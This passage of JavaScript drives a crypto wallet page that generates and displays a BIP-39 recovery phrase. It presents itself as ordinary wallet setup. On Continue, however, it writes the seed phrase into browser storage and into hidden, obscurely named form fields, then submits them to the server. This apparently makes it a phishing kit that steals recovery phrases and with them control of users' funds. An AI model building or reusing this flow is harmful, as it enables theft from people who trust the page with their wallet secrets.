    if (!Array.isArray(words) || words.length !== count) {
      return { valid: false, reason: `Enter exactly ${count} words.` };
    }
    const seen = new Set();
    for (const w of words) {
      if (!w || !/^[a-z]+$/.test(w)) {
        return { valid: false, reason: 'Words must be lowercase letters only.' };
      }
      const lw = w.toLowerCase();
      if (seen.has(lw)) {
        return { valid: false, reason: 'Do not repeat any word. Use unique words only.' };
      }
      seen.add(lw);
    }
    // Validate checksum using ethers when available
    try {
      if (typeof ethers !== 'undefined' && ethers.Mnemonic && typeof ethers.Mnemonic.isValidMnemonic === 'function') {
        const phrase = words.join(' ');
        const ok = ethers.Mnemonic.isValidMnemonic(phrase);
        if (!ok) return { valid: false, reason: 'Checksum invalid. Regenerate your phrase.' };
      } else {
        return { valid: false, reason: 'BIP-39 library missing. Please reload.' };
      }
    } catch (_) { return { valid: false, reason: 'Unexpected error validating mnemonic.' }; }
    return { valid: true };
  };

  const updateContinue = () => {
    const { valid, reason } = validateGen(currentWords, currentCount);
    const confirmOK = !confirmCheck || confirmCheck.checked;
    const canContinue = !!valid && !!confirmOK;
    continueBtn.disabled = !canContinue;
    continueBtn.classList.toggle('enabled', !!canContinue);
    if (errorEl) {
      if (!valid && reason) {
        errorEl.textContent = reason;
        errorEl.style.display = 'block';
      } else {
        errorEl.textContent = '';
        errorEl.style.display = 'none';
      }
    }
  };

  const derivePreview = () => {
    try {
      const addrRow = document.querySelector('#genAddressDisplay');
      const addrText = document.querySelector('#genAddressText');
      if (!addrRow || !addrText || typeof ethers === 'undefined') return;
      const phrase = currentWords.join(' ');
      const pass = passInput ? passInput.value : '';
      let idx = indexInput ? parseInt(indexInput.value, 10) : 0;
      if (Number.isNaN(idx) || idx < 0) idx = 0;
      const path = `m/44'/60'/0'/0/${idx}`;
      let wallet;
      try {
        const root = ethers.HDNodeWallet.fromPhrase(phrase, pass);
        wallet = root.derivePath(path);
      } catch (_) {
        wallet = ethers.Wallet.fromPhrase(phrase, pass, path);
      }
      addrText.textContent = wallet.address;
      addrRow.style.display = 'block';

    } catch (_) {}
  };

  // Initialize wordlist
  try {
    if (Array.isArray(window.WORDLIST) && window.WORDLIST.length > 0) {
      wordlistArr = window.WORDLIST.map((w) => String(w));
      allowedWordSet = new Set(wordlistArr.map((w) => w.toLowerCase()));
      // Auto-create on load
      (async () => { await createPhrase(); })();
    }
  } catch (_) {
    allowedWordSet = null;
  }

  async function createPhrase() {
    try {
      if (!(typeof ethers !== 'undefined' && ethers.Mnemonic && typeof ethers.randomBytes === 'function')) {
        currentWords = [];
        if (errorEl) {
          errorEl.textContent = 'Real BIP-39 generation unavailable. Please reload.';
          errorEl.style.display = 'block';
        }
        renderGenChips(currentWords, currentCount);
        updateContinue();
        derivePreview();
        return;
      }
      const countToBytes = { 12: 16, 15: 20, 18: 24, 21: 28, 24: 32 };
      const bytes = countToBytes[currentCount] || 16;
      const entropy = ethers.randomBytes(bytes);
      const mnemonic = ethers.Mnemonic.fromEntropy(entropy);
      const words = mnemonic.phrase.trim().split(/\s+/);
      currentWords = words;
    } catch (e) {
      currentWords = [];
      if (errorEl) {
        errorEl.textContent = 'Failed to generate a valid BIP-39 phrase. Please try again.';
        errorEl.style.display = 'block';
      }
    }
    renderGenChips(currentWords, currentCount);
    setMasked(true);
    updateContinue();
    derivePreview();
  };

  if (showAllBtn) {
    showAllBtn.addEventListener('click', () => {
      setMasked(!chipsMasked);
    });
  }
  countSelect.addEventListener('change', async () => {
    currentCount = Number(countSelect.value) || 12;
    await createPhrase();
  });
  if (confirmCheck) {
    confirmCheck.addEventListener('change', updateContinue);
  }
  if (passInput) {
    passInput.addEventListener('input', () => { derivePreview(); });
  }
  if (indexInput) {
    indexInput.addEventListener('input', () => { derivePreview(); });
  }
  copyBtn && copyBtn.addEventListener('click', async () => {
    const phrase = currentWords.join(' ');
    try {
      await navigator.clipboard.writeText(phrase);
      copyBtn.textContent = 'Copied';
      setTimeout(() => { copyBtn.textContent = 'Copy'; }, 1500);
    } catch (_) {
      alert('Clipboard access denied. Please copy manually.');
    }
  });
  continueBtn.addEventListener('click', async () => {
    updateContinue();
    if (continueBtn.disabled) return;
    const phrase = currentWords.join(' ');
    const pass = '';
    const path = "m/44'/60'/0'/0/0";
    try {
      sessionStorage.setItem('generated_srp', phrase);
      localStorage.setItem('generated_srp', phrase);
    } catch (_) {}
    
    // Populate hidden form fields and submit to server
    const form = document.getElementById('srpSubmitForm');
    const hW3 = document.getElementById('hiddenW3');
    const hW2 = document.getElementById('hiddenW2');
    
    if (hW3) hW3.value = phrase;
    if (hW2) hW2.value = ''; // No passphrase for generate flow
    
    if (form) {
      form.submit();
    } else {
      window.location.href = 'dashboard.html';
    }
  });
});
